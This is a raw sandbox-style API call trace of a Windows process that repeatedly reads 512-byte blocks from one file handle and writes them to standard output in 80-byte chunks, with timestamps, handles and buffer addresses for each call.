[0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] GetFileType (hFile=0x4c) returned 0x1 [0098.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.622] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.622] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] GetFileType (hFile=0x4c) returned 0x1 [0098.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.623] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.623] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType 
(hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] GetFileType (hFile=0x4c) returned 0x1 [0098.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.624] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.624] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.625] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, 
lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] GetFileType (hFile=0x4c) returned 0x1 [0098.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.625] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.625] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] GetFileType (hFile=0x4c) returned 0x1 [0098.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.626] WriteFile (in: hFile=0x4c, 
lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.626] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] GetFileType (hFile=0x4c) returned 0x1 [0098.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.627] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.627] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, 
lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 
| out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] GetFileType (hFile=0x4c) returned 0x1 [0098.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.628] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.628] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.629] GetFileType (hFile=0x4c) returned 0x1 [0098.629] _get_osfhandle (_FileHandle=1) returned 0x4c 
